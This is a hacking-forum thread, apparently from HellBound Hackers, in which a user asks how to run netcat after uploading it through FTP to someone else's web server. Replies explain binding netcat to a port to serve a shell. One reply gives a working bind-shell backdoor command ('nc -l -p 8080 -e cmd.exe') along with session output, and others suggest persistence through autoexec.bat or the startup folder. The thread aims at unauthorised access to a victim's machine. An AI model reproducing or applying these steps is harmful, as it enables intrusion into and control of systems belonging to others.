Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Putting in NetCat

0 0

Hello, If im inside someones ftp on hes web server and i upload netcat. How do i get it to execute?

0 0

What OS is the server? Do you have write access outside the /pub directories?

But mostly, it depends on the OS. The best and eaisest way to do it is to try and overwrite a config file, replacing it with your own, preferably one that gets netcat to bind to a port and throw up a shell.

0 0

This is a bit off topic, but what exactly is a shell?

0 1

[simple] it is a tool that allows your to send commands to the computer. [/simple]

A shell is a tool to enable users to interact with the system. Usually shells are text based and command line oriented and send commands that the kernal will understand.

0 0

in windows for example (very lame example and barely borders a shell) MS-DOS console.

thats more of a command line tho than a shell.

some OS's are nothing but a shell (WarDrivers Linux Assualt Kit ;))

0 0

Okay lets say the OS is windows, on an 2000 server and one on XP

0 0

Ooh thanks Cheese i get it now :P!

0 0

If you uploaded netcat on victim's computer , you can make your Netcat like a backdoor to open a port , connect to it and having fun :p For example , let see this :

E:\>nc -nvv -l -p 8080 -e cmd.exelistening on [any] 8080 ...connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error

and then connect to victim with port 8080

C:\>nc -nvv 172.16.84.2 8080(UNKNOWN) [172.16.84.2] 8080 (?) openMicrosoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.E:\>cd testcd testE:\test>dir /wdir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test[.]            [..]           head.log       NETUSERS.EXE   NetView.exentcrash.zip    password.txt   pwdump.exe               6 File(s)        262,499 bytes               2 Dir(s)     191,488,000 bytes freeC:\test>exitexitsent 20, rcvd 450: NOTSOCK

I just make this code not clear :)

0 0

DeealerX9,

well, either edit autoexec.bat to call netcat, or put a batch file into the statup folder that calls netcat.

You'll need write access to these which i doubt you'll have over an FTP connection…